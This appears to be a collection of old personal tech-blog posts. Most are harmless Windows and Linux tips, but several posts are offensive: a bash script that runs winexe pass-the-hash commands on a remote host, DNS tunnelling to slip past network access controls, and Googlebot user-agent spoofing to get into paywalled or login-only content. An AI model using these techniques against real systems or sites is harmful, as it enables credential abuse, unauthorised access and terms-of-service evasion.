So some people started to really bust loose with the out of the box thinking on this one. You know how you will hit some networks where you can only get DNS? like wifi spots? Guest networks NAC subnets? Here is a little trick to get access to resources by using UDP53 add that to your pentest. The first link has source step by step hosting service and video on how to work it, the other two are just followup info.

skript kiddy help for DNS tunnel

description with code sample for the dns tunnel

full how to dns tunnel

yes recover deleted files from PST

1. To corrupt the PST file, opening it with the hex editor.
2. Delete positions 7 through 13 with the spacebar. Since you're using hexadecimal numbering, this actually clears 13 characters in the following positions:
3. 00007
   00008
   00009
   0000a
   0000b
   0000c
   0000d
   0000e
   0000f
   00010
   00011
   00012
   00013
   (The editor displays the code “20” each time you clear a position with the spacebar.)
4. After clearing those positions in the file, save it. Your PST is now corrupted.
5. Run the Inbox Repair Tool, SCANPST.exe, to recover the file. On Win2K and WinNT systems, the executable is located in For additional information on the Inbox Repair Tool, see Microsoft Knowledge Base article 287497.
6. After creating a backup, the Inbox Repair Tool repairs the damage and recreates the PST. Open the new PST in Outlook. The Deleted Items folder should contain all removed messages, so anything you've emptied will be restored.

is this legal? either way, its a hack. frog automation

I have swiped a copy of the audio book from bittorrent and cheated and skipped ahead to the last 30 mins. All the hype about who died, it was Tony Soprano they killed at about 27 min to the end of the book (audio) boring, totally saw that coming.

I got my first corporate Vista box today, im not that impressed. Its a lot of ho-hum slow GUI mess if you ask me. yea you can change vista to look like XP again and use all the normal windows 2000 GUI look, feel. But its just slow. the hard disk is always dooing something. More importantly some reason ipv6 is running and my network isnt a fan of it on the PC. I dont know why and I dont have time to figure out, but I do know how to shut it off. problem solved from my end.

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters]
"DisabledComponents"=dword:000000ff

and if you want to back out that change, either delete 'DisabledComponents" or set it to 0.
If you are curious what each bit of the DWORD does, here you go:

Disable all tunnel interfaces:
0x00000001
Disable 6to4:
0x00000002
Disable ISATAP:
0x00000004
Disable Teredo:
0x00000008
Disable Teredo and 6to4:
0x0000000A
Disable all LAN and PPP interfaces:
0x00000010
Disable all LAN, PPP, and tunnel interfaces:
0x00000011
Prefer IPv4 over IPv6:
0x00000020
Disable IPv6 over all interfaces and prefer IPv4 to IPv6:
0x000000FF

I have made a script to demo the use of winexe with the pass the hash patch. This script is nothing more then a fast entry bash script to demo in front of people so they don't have to know linux command line to understand what is happening.

#!/bin/bash
# Name: hash_pass
# Version: .01
echo ""
echo "Demo of Passing the hash exploite with SMB and NT/LM hash"
echo ""
echo -n "paste hash in format LM_HASH:NTLM_HASH : "
read hsh
export SMBHASH=$hsh
echo -n "username and domain in format DOMAIN/user note / not \: "
read usid
echo -n "hostname or IP for use of resource: "
read hst
echo -n "command to run on host ex. cmd.exe: "
read comnd
./winexe -U $usid%foo //$hst $comnd

now there are a lot of tricks I dont know, but here are a few that were rather interesting that I havent picked up in my years of emergency linux support work.

apropos -  apropos - search the whatis database for strings  

whereis- locate the binary, source, and manual page files for a command on disk (adding -b will only give binary returns)

Alt + SysRq + B

If you’re not running any crucial, scheduled tasks or in the middle of composing a letter or an e-mail then this key combination may be the one to use. It will reboot the system immediately without bothering to sync or unmount disks.

Alt + SysRq + R

If you cannot get to a terminal window by using Ctrl + Alt + F2 then use this key combination (pressed altogether) to get a keyboard (this is because this key combination turns off what is called keyboard raw mode. Pressing these keys allows keyboard input even after your X-Windows session has crashed/frozen). Now, try Ctrl + Alt + F2 again and you can close down from the terminal. If that fails move on to the next option.

Alt + SysRq + S

This key combo does just what it says on the tin: it (S)ync’s all filesystems which reduces the possibility of loosing any data and possibly obviating the need for the system to run fsck upon reboot.

Alt + SysRq + U

As you might guess, this one tries to unmount disks and remount them as read only.

Alt + SysRq + O

Not so obvious, but this will power off your machine without syncing or unmounting disks (but it won’t reboot)

 

 

I googled me today. found a guy with a blog that looks like his, I say his because I use the theme he created and I found a problem with IE7 and helped him fix it. Well I post this because he has a good tech-nerd-IT blog just like me. So add his to your RSS

The following trick will allow you to view some BBS services with out having to register, or some technical sites that require a log-in you might be able to access the data so you dont need to have accounts all over the intertubes. When this gets banned out just change to any other bots see the last bit of the post for all bot info I took from the dasblog source code.

alter your settings to the following:

User Agent: Googlebot/2.1
Compatible: http://www.googlebot.com/bot.html

You can do so in Opera with ease. Firefox offers an extension which is downloadable from the official website.

to set up the plugin, click on add, the name your 'agent" something like: google

in the description text box. For the "User Agent" field, put this: Googlebot/2.1 (http://www.googlebot.com/bot.html)

save it, then to acces the plugin, go to tools (next to help on the menu bar in firefox) mouse over Agent Switcher, and select google, surf away. A word of warning, some sites will ban you if they do an IP range check, or a reverse DNS check and your IP doesnt match that of their stored googlebot IP addy or DNS

For Internet Explorer you need to change registry entries.

Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionInternet Settings5.0User Agent] @="Googlebot/2.1" "Compatible"="+http://www.googlebot.com/bot.html"

Save this as bot.reg and execute.

To revert the changes back, you need the following:

Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionInternet Settings5.0User Agent] @="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

Save as nobot.reg and execute.

<UserAgents>
  <string>msnbot-Products/1.0 (+http://search.msn.com/msnbot.htm)</string>
  <string>MJ12bot/v1.0.8 (http://majestic12.co.uk/bot.php?+)>
  <string>ISC Systems iRc Search 2.1</string>
  <string>ichiro/2.0 (http://help.goo.ne.jp/door/crawler.html)>
  <string>Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)</string>
  <string>asterias/2.0</string>
  <string>www.adressendeutschland.de</string>
  <string>NutchCVS/0.7.1 (Nutch; http://lucene.apache.org/nutch/bot.html; raphael@unterreuth.de)>
  <string>Snapbot/1.0</string>
  <string>msnbot/1.0 (+http://search.msn.com/msnbot.htm)</string>
  <string>Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)</string>
  <string>Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)</string>
  <string>RufusBot (Rufus Web Miner; http://64.124.122.252/feedback.html)>
  <string>Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)>
  <string>Gigabot/2.0/gigablast.com/spider.html</string>
  <string>TurnitinBot/2.0 http://www.turnitin.com/robot/crawlerinfo.html>
  <string>Mozilla/5.0 (compatible; BecomeBot/3.0; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)</string>
  <string>Sphere Scout&amp;v4.0 (beta) - scout at sphere dot com</string>
  <string>Gigabot/2.0; http://www.gigablast.com/spider.html>
  <string>msnbot/0.9 (+http://search.msn.com/msnbot.htm)</string>
 </UserAgents>

 So, how do you beat all 5 major types of cloaking?

1. Beat IP Delivery: Use Google Translate as a Proxy, translating from spanish->english even though the site is already in English.
2. Beat User-Agent Cloaking: Use the FirefoxUser-Agent Switcher to spoof as GoogleBot
3. Beat Javascript Detection: Use the Firefox Web Developer Toolbar to turn off javascript.
4. Beat Cookie Detection: Use the Firefox Web Developer Toolbar to turn off cookies.
5. Beat Referer Detection: Use the Firefox RefControl Extension to prevent referer from being sent.

Using these in conjunction can be extremely effective, even at pay-for-information sites.
Doing this may be against the terms of service of the site you are visiting. There are plenty of popular sites out their that cloak content which is normally only available to paying members. While these techniques work on those sites too, be careful.

Good browsing!

I upgraded to the newest build of dasBlog over the weekend. being that this was also July 4th weekend I thought I would post that I did not blow up my hand this year. I also am trying to fix the database that spammers ruined on the gallery so the pictures are back on line soon.